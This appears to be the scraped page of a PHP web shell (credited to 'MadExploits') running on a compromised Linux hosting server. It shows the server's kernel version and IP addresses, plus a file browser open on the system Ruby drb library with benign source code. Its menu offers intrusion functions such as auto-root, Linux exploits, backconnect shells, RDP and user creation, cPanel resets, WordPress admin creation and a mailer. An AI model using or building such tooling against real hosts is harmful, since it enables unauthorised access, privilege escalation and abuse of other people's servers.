Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
ruby /
drb /
[ HOME SHELL ]
Name
Size
Permission
Action
acl.rb
4.65
KB
-rw-r--r--
drb.rb
55.39
KB
-rw-r--r--
eq.rb
244
B
-rw-r--r--
extserv.rb
1.2
KB
-rw-r--r--
extservm.rb
1.71
KB
-rw-r--r--
gw.rb
2.97
KB
-rw-r--r--
invokemethod.rb
746
B
-rw-r--r--
observer.rb
636
B
-rw-r--r--
ssl.rb
11.5
KB
-rw-r--r--
timeridconv.rb
2.11
KB
-rw-r--r--
unix.rb
2.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : invokemethod.rb
# for ruby-1.8.0 module DRb class DRbServer module InvokeMethod18Mixin # :nodoc: all def block_yield(x) if x.size == 1 && x[0].class == Array x[0] = DRbArray.new(x[0]) end @block.call(*x) end def perform_with_block @obj.__send__(@msg_id, *@argv) do |*x| jump_error = nil begin block_value = block_yield(x) rescue LocalJumpError jump_error = $! end if jump_error case jump_error.reason when :break break(jump_error.exit_value) else raise jump_error end end block_value end end end end end
Close